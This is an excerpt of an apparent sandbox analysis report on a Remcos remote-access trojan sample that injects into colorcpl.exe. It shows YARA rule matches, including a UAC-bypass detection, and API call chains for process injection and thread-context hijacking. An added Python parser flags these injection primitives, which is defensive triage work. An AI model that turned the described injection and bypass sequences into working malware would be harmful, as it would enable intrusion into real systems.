              Source: Yara match | File source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.4570116894.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 828, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A9A76C SystemParametersInfoW | 5_2_04A9A76C

              System Summary

              Source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 5.2.colorcpl.exe.68d0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.colorcpl.exe.68d0000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.colorcpl.exe.68d0000.2.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 5.2.colorcpl.exe.68d19c5.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.colorcpl.exe.68d19c5.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.colorcpl.exe.68d19c5.1.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 5.2.colorcpl.exe.68d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.colorcpl.exe.68d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.colorcpl.exe.68d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 5.2.colorcpl.exe.4a80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.colorcpl.exe.4a80000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.colorcpl.exe.4a80000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 5.2.colorcpl.exe.68d19c5.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.colorcpl.exe.68d19c5.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.colorcpl.exe.68d19c5.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: Process Memory Space: colorcpl.exe PID: 828, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B4DACC RtlDosPa,NtCreateFile,NtWriteFile,NtClose
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B4DA44 RtlInitUnicodeString,RtlDosPa,NtDeleteFile
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B4DBB0 RtlDosPa,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B479B4 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B4AF58 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B47D00 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B4831C NtProtectVirtualMemory
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B48BB0 GetThreadContext,SetThreadContext,NtResumeThread
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B48BAE GetThreadContext,SetThreadContext,NtResumeThread
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B479B2 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B4D9F0 RtlInitUnicodeString,RtlDosPa,NtDeleteFile
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Code function: 7_2_02C8DACC RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Code function: 7_2_02C8DA44 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Code function: 7_2_02C8DBB0 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Code function: 7_2_02C8AF58 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Code function: 7_2_02C87D00 NtWriteVirtualMemory
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Code function: 7_2_02C88BAE Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Code function: 7_2_02C88BB0 Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Code function: 7_2_02C8D9F0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B4EC74 InetIsOffline,CoInitialize,CoUninitialize,Sleep,MoveFileA,MoveFileA,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A94DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress
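The "Code function" rows above are the most useful part of this table for a triager: the loader in MeP66xi1AM.exe carries NtOpenProcess, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory and NtCreateThreadEx (the classic remote-injection chain), and both the loader and the dropped Wnbcdrjt.PIF contain GetThreadContext, SetThreadContext and NtResumeThread in one function (thread-context hijacking, which is also how a hollowed process is started). The following Python is an added example, not part of the Joe Sandbox report or of any tool the report describes: it parses rows in the raw row format (source glued to "Code function:", function id repeated as trailing link text), groups the imported API names per process image and reports which injection primitives each image exhibits. The sample rows are copied from this report; the row for 7_2_02C88BAE has its Heap32Next run abbreviated, and the primitive table and verdict labels are this example's own choices.

```python
import re
from collections import defaultdict

# Constructed input: rows copied from the "Code function" table of this report. A raw
# row glues the source image to the literal text "Code function:" and repeats the
# function id at the end (it was the hyperlink text in the sandbox's HTML). The row
# for 7_2_02C88BAE is abbreviated here (the Heap32Next run is shortened).
SAMPLE_ROWS = r"""
Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B479B4 NtAllocateVirtualMemory,0_2_02B479B4
Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B4AF58 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx,0_2_02B4AF58
Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B47D00 NtWriteVirtualMemory,0_2_02B47D00
Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B4831C NtProtectVirtualMemory,0_2_02B4831C
Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B48BB0 GetThreadContext,SetThreadContext,NtResumeThread,0_2_02B48BB0
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFCode function: 7_2_02C8AF58 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,7_2_02C8AF58
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFCode function: 7_2_02C87D00 NtWriteVirtualMemory,7_2_02C87D00
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFCode function: 7_2_02C88BAE Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next,7_2_02C88BAE
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AD050B5_2_04AD050B
"""

# Function ids look like <process index>_<context>_<8 hex digits>; the fixed width is
# what lets us split "5_2_04AD050B5_2_04AD050B" (address-only row, id repeated twice).
ROW_RE = re.compile(
    r"^Source:\s*(?P<source>.*?)\s*\|?\s*Code function:\s*"
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]{8})\s*(?P<rest>.*)$"
)

# Injection primitives grouped by role (example's own table, not the sandbox's).
PRIMITIVES = {
    "open_process":  {"NtOpenProcess", "OpenProcess"},
    "alloc":         {"NtAllocateVirtualMemory", "VirtualAllocEx"},
    "write":         {"NtWriteVirtualMemory", "WriteProcessMemory"},
    "protect":       {"NtProtectVirtualMemory", "VirtualProtectEx"},
    "remote_thread": {"NtCreateThreadEx", "CreateRemoteThread", "RtlCreateUserThread"},
    "get_ctx":       {"GetThreadContext", "NtGetContextThread"},
    "set_ctx":       {"SetThreadContext", "NtSetContextThread"},
    "resume":        {"NtResumeThread", "ResumeThread"},
}


def parse_row(line):
    """Return (source image, function id, [api, ...]) or None for a non-matching line."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    fid, rest = m["fid"], m["rest"]
    if rest.endswith(fid):              # drop the repeated link text
        rest = rest[: -len(fid)]
    apis = [a for a in rest.split(",") if a]
    return m["source"], fid, apis


def _ordered(apis, steps):
    """True if apis contains one member of each step, in the given order."""
    pos = 0
    for step in steps:
        while pos < len(apis) and apis[pos] not in PRIMITIVES[step]:
            pos += 1
        if pos == len(apis):
            return False
        pos += 1
    return True


def analyze(text):
    """Per source image: the set of primitives seen and the functions that hijack a thread context."""
    per_source = defaultdict(lambda: {"primitives": set(), "ctx_hijack_functions": []})
    for line in text.strip().splitlines():
        parsed = parse_row(line)
        if parsed is None:
            continue
        source, fid, apis = parsed
        entry = per_source[source]
        seen = set(apis)
        for name, members in PRIMITIVES.items():
            if seen & members:
                entry["primitives"].add(name)
        if _ordered(apis, ("get_ctx", "set_ctx", "resume")):
            entry["ctx_hijack_functions"].append(fid)
    return dict(per_source)


def verdict(entry):
    """Human-readable findings for one image, derived only from the primitives present."""
    p = entry["primitives"]
    findings = []
    if {"open_process", "write", "remote_thread"} <= p:
        findings.append("remote thread injection")
    if entry["ctx_hijack_functions"]:
        findings.append("thread-context hijack")
    if {"alloc", "write", "protect"} <= p:
        findings.append("remote memory written and re-protected")
    return findings


if __name__ == "__main__":
    for image, entry in analyze(SAMPLE_ROWS).items():
        print(image, "->", verdict(entry) or ["no injection primitives"])
```

Run against the sample rows, the loader executable gets all three findings, Wnbcdrjt.PIF only the thread-context hijack (the report shows no allocation or thread-creation function for it), and colorcpl.exe none, which is consistent with colorcpl.exe being the injection target rather than the injector.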
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B320C4
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B5D596
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AD050B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AB6510
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AB569E
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AB16FB
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AA57FB
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AC3700
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AA5152
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AB5286
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AD13D4
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AB3C0B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AB4D8A
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A9CEAF
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04ABDE2A
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AB5F08
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A928E3
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04ABD9CC
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A9B917
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AA5964
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AB5AD3
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04ACABA9
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04ABDBFB
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AA4BC3
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_068E36A8
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_068EC6DC
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_0690E791
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_068F6729
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_069024C0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_069144C5
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_06906463
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_068F65C0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_069212D0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_069072D5
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_0690604B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_06922199
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_068F5F17
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_06906CCD
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_068EDC74
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_0690EBEF
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_06905B4F
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_06906898
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_068F5988
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_069049D0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_0690E9C0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_0691B96E
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Code function: 7_2_02C720C4
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Code function: 7_2_02C7D59B
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Code function: String function: 02C887A0 appears 48 times
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Code function: String function: 02C746A4 appears 154 times
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Code function: String function: 02C7480C appears 619 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 04AB2525 appears 41 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 04A82073 appears 51 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 06903955 appears 53 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 069032EA appears 41 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 04AB2B90 appears 53 times
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: String function: 02B48824 appears 45 times
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: String function: 02B344AC appears 73 times
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: String function: 02B3480C appears 931 times
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: String function: 02B344D0 appears 32 times
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: String function: 02B487A0 appears 54 times
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: String function: 02B346A4 appears 244 times
Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs MeP66xi1AM.exe
Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs MeP66xi1AM.exe
Source: MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs MeP66xi1AM.exe
Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs MeP66xi1AM.exe
Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs MeP66xi1AM.exe
Source: MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs MeP66xi1AM.exe
Source: MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs MeP66xi1AM.exe
Source: MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs MeP66xi1AM.exe
Source: MeP66xi1AM.exe, 00000000.00000003.2172985786.0000000021AD5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs MeP66xi1AM.exe
Source: MeP66xi1AM.exe, 00000000.00000003.2172985786.0000000021AA6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs MeP66xi1AM.exe
Source: MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs MeP66xi1AM.exe
Source: MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs MeP66xi1AM.exe
Source: MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs MeP66xi1AM.exe
Source: MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs MeP66xi1AM.exe
Source: MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020A08000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs MeP66xi1AM.exe
Source: MeP66xi1AM.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 5.2.colorcpl.exe.68d0000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.colorcpl.exe.68d0000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.colorcpl.exe.68d0000.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 5.2.colorcpl.exe.68d19c5.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.colorcpl.exe.68d19c5.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.colorcpl.exe.68d19c5.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 5.2.colorcpl.exe.68d0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.colorcpl.exe.68d0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.colorcpl.exe.68d0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 5.2.colorcpl.exe.4a80000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.colorcpl.exe.4a80000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.colorcpl.exe.4a80000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 5.2.colorcpl.exe.68d19c5.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.colorcpl.exe.68d19c5.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.colorcpl.exe.68d19c5.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
